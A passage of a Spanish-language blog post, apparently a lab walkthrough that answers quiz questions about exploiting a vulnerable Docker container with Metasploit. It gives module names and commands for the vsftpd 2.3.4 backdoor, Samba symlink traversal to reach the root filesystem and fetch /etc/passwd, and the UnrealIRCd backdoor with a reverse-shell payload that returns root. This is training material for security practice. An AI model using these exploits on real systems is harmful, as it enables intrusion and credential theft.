                                      \"\"<\/figure>\n\n\n\n
                                      \"\"<\/figure>\n\n\n\n
                                      Pregunta 2<\/strong><\/p>\n\n\n\n
                                      \u00bfExiste alguna vulnerabilidad asociada al servicio y versi\u00f3n? Si la respuesta es que s\u00ed, \u00bfc\u00f3mo se llama el m\u00f3dulo que hay que usar en Metasploit?<\/strong><\/p>\n\n\n\n
                                      Formato de respuesta1 (No): No<\/em><\/p>\n\n\n\n
                                      Formato de respuesta2 (S\u00ed): rutacompletadelmodulo<\/em><\/p>\n\n\n\n
                                        \n
                                      • Buscamos<\/li>\n<\/ul>\n\n\n\n
                                        search vsFTPd 2.3.4<\/code><\/pre>\n\n\n\n
                                        \"\"<\/figure>\n\n\n\n
                                          \n
                                        • Respuesta<\/li>\n<\/ul>\n\n\n\n
                                          exploit\/unix\/ftp\/vsftpd_234_backdoor<\/code><\/pre>\n\n\n\n
                                          \"\"<\/figure>\n\n\n\n
                                          A por SMB<\/h3>\n\n\n\n
                                          Otro de los puertos que vistes abierto fue el puerto 445, por lo que intuyes que est\u00e1 en ejecuci\u00f3n el protocolo SMB. <\/p>\n\n\n\n
                                          Cuando se configura Samba<\/strong> con un recurso compartido escribible y \u00abwide links<\/em>\u00bb habilitados (por defecto est\u00e1 activado), tambi\u00e9n se puede utilizar como una especie de puerta trasera para acceder a archivos que no estaban destinados a ser compartidos.<\/p>\n\n\n\n
                                          Tu misi\u00f3n ser\u00e1 verificar este tipo de vulnerabilidad y conseguir acceso al sistema de archivos ra\u00edz utilizando una conexi\u00f3n an\u00f3nima y un recurso compartido de escritura, en caso de que se pueda usando Metasploit.<\/p>\n\n\n\n
                                          Pregunta 1<\/strong><\/p>\n\n\n\n
                                          \u00bfQu\u00e9 comando, usando smbclient, tienes que introducir para verificar las conexiones an\u00f3nimas?<\/strong><\/p>\n\n\n\n
                                          Ejemplo de respuesta: smbclient -opcion1 -opcion2 -opcion3 \/\/IP\/rutaquesea<\/em><\/p>\n\n\n\n
                                          NOTA<\/strong>: Como las IPs pueden diferir, dejar indicado \/\/IP <\/strong>en la respuesta sin especificar la misma.<\/em><\/p>\n\n\n\n
                                            \n
                                          • Respuesta<\/li>\n<\/ul>\n\n\n\n
                                            smbclient -L \/\/IP\nsmbclient -L 172.17.0.2<\/code><\/pre>\n\n\n\n
                                            \"\"<\/figure>\n\n\n\n
                                            \"\"<\/figure>\n\n\n\n
                                            \"\"<\/figure>\n\n\n\n
                                            \"\"<\/figure>\n\n\n\n
                                              \n
                                            • con base a la encontrado en el pregunta anterior debemos usar el moudlo symlik_traversal<\/li>\n<\/ul>\n\n\n\n
                                              use auxiliary\/admin\/smb\/samba_symlink_traversal\nset RHOSTS 172.17.0.2\nset SMBSHARE tmp\nrun<\/code><\/pre>\n\n\n\n
                                              \"\"<\/figure>\n\n\n\n
                                                \n
                                              • Luego nos conectamos a share y navegamos al root:<\/li>\n<\/ul>\n\n\n\n
                                                smbclient \/\/172.17.0.2\/tmp -N\ncd rootfs\nls<\/code><\/pre>\n\n\n\n
                                                \"\"<\/figure>\n\n\n\n
                                                \"\"<\/figure>\n\n\n\n
                                                \"\"<\/figure>\n\n\n\n
                                                Pregunta 6<\/strong><\/p>\n\n\n\n
                                                Una vez en el directorio ra\u00edz, prueba a listar las cuentas de usuarios del sistema.<\/p>\n\n\n\n
                                                \u00bfC\u00f3mo se llama el usuario con UID=2?<\/strong><\/p>\n\n\n\n
                                                  \n
                                                • para esto descargamos el archivo<\/li>\n<\/ul>\n\n\n\n
                                                  cd rootfs\ncd etc\n# get lo descarga\nget passwd<\/code><\/pre>\n\n\n\n
                                                    \n
                                                  • Salimos y si listamos vemos el archivo<\/li>\n<\/ul>\n\n\n\n
                                                    ls<\/code><\/pre>\n\n\n\n
                                                    \"\"<\/figure>\n\n\n\n
                                                      \n
                                                    • Abrimos el archivo<\/li>\n<\/ul>\n\n\n\n
                                                      nano passwd<\/code><\/pre>\n\n\n\n
                                                        \n
                                                      • el orden de los campos es <\/li>\n<\/ul>\n\n\n\n
                                                        usuario:contrase\u00f1a:UID:GID:descripci\u00f3n:directorio_home:shell<\/code><\/pre>\n\n\n\n
                                                          \n
                                                        • El contenido del archivo <\/li>\n<\/ul>\n\n\n\n
                                                          root:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/bin\/sh\nbin:x:2:2:bin:\/bin:\/bin\/sh\nsys:x:3:3:sys:\/dev:\/bin\/sh\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/bin\/sh\nman:x:6:12:man:\/var\/cache\/man:\/bin\/sh\nlp:x:7:7:lp:\/var\/spool\/lpd:\/bin\/sh\nmail:x:8:8:mail:\/var\/mail:\/bin\/sh\nnews:x:9:9:news:\/var\/spool\/news:\/bin\/sh\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/bin\/sh\nproxy:x:13:13:proxy:\/bin:\/bin\/sh\nwww-data:x:33:33:www-data:\/var\/www:\/bin\/sh\nbackup:x:34:34:backup:\/var\/backups:\/bin\/sh\nlist:x:38:38:Mailing List Manager:\/var\/list:\/bin\/sh\nirc:x:39:39:ircd:\/var\/run\/ircd:\/bin\/sh\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/bin\/sh\nnobody:x:65534:65534:nobody:\/nonexistent:\/bin\/sh\nlibuuid:x:100:101::\/var\/lib\/libuuid:\/bin\/sh\ndhcp:x:101:102::\/nonexistent:\/bin\/false\n<\/code><\/pre>\n\n\n\n
                                                            \n
                                                          • por tanto seria el usuario<\/li>\n<\/ul>\n\n\n\n
                                                            bin:x:2:2:bin:\/bin:\/bin\/sh<\/code><\/pre>\n\n\n\n
                                                            \"\"<\/figure>\n\n\n\n
                                                            IRC daemon<\/h3>\n\n\n\n
                                                            En el puerto 6667<\/strong> hay un servicio IRC en ejecuci\u00f3n. \u00bfPor qu\u00e9 no pruebas a investigar si es vulnerable y lo intentas explotar?<\/p>\n\n\n\n
                                                            Pregunta 1<\/strong><\/p>\n\n\n\n
                                                              \n
                                                            • Entonces para saber la versi\u00f3n <\/li>\n<\/ul>\n\n\n\n
                                                              nmap -sV -p 6667 172.17.0.2<\/code><\/pre>\n\n\n\n
                                                              \"\"<\/figure>\n\n\n\n
                                                                \n
                                                              • No se logra obtener entonces<\/li>\n<\/ul>\n\n\n\n
                                                                nc -vn 172.17.0.2 6667<\/code><\/pre>\n\n\n\n
                                                                  \n
                                                                • Tampoco se logra<\/li>\n<\/ul>\n\n\n\n
                                                                  \"\"<\/figure>\n\n\n\n
                                                                    \n
                                                                  • Prueba buscando el m\u00f3dulo en Metasploit, que s\u00ed detecta la versi\u00f3n:<\/li>\n\n\n\n
                                                                  • buscamos<\/li>\n<\/ul>\n\n\n\n
                                                                    search ircd<\/code><\/pre>\n\n\n\n
                                                                    \"\"<\/figure>\n\n\n\n
                                                                      \n
                                                                    • Lo usamos<\/li>\n<\/ul>\n\n\n\n
                                                                      use exploit\/unix\/irc\/unreal_ircd_3281_backdoor\nset RHOSTS 172.17.0.2\ninfo<\/code><\/pre>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      Pregunta 2<\/strong><\/p>\n\n\n\n
                                                                      \u00bfQu\u00e9 tipo de vulnerabilidad presenta?<\/strong><\/p>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      Pregunta 3<\/strong><\/p>\n\n\n\n
                                                                      \u00bfCu\u00e1l es el m\u00f3dulo que has usado para conseguir acceso al sistema?<\/strong><\/p>\n\n\n\n
                                                                      exploit\/unix\/irc\/unreal_ircd_3281_backdoor<\/code><\/pre>\n\n\n\n
                                                                      \"\"<\/figure>\n\n\n\n
                                                                      Pregunta 4<\/strong><\/p>\n\n\n\n
                                                                      \u00bfQu\u00e9 UID tienes al conseguir explotar la vulnerabilidad?<\/strong><\/p>\n\n\n\n
                                                                        \n
                                                                      • para esto la debemos explotar<\/li>\n<\/ul>\n\n\n\n
                                                                        use exploit\/unix\/irc\/unreal_ircd_3281_backdoor\nset RHOSTS 172.17.0.2\nset PAYLOAD cmd\/unix\/reverse\nset LHOST 172.17.0.1\nrun<\/code><\/pre>\n\n\n\n
                                                                        \"\"<\/figure>\n\n\n\n
                                                                          \n
                                                                        • Una vez que obtengas la sesi\u00f3n, ejecuta:<\/li>\n<\/ul>\n\n\n\n
                                                                          id<\/code><\/pre>\n\n\n\n
                                                                            \n
                                                                          • Resultado<\/li>\n<\/ul>\n\n\n\n
                                                                            uid=0(root) gid=0(root) groups=0(root)<\/code><\/pre>\n\n\n\n
                                                                            \"\"<\/figure>\n\n\n\n
                                                                            \"\"<\/figure>\n\n\n\n
                                                                            <\/p>\n","protected":false},"excerpt":{"rendered":"
                                                                            Para experimentar un poco con Metasploit, lo que haremos ser\u00e1 desplegar una imagen docker vulnerable en nuestra Kali Linux. Lo primero que habr\u00e1 que hacer es instalar docker. Para ello hay que seguir los siguientes pasos: 1. Actualiza la lista de paquetes: 2. Instala los paquetes requeridos: 3. A\u00f1ade la clave PGP de docker: 4. […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23497","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23497"}],"version-history":[{"count":8,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497\/revisions"}],"predecessor-version":[{"id":23599,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23497\/revisions\/23599"}],"wp:attachment":[{"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23497"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23497"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23497"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}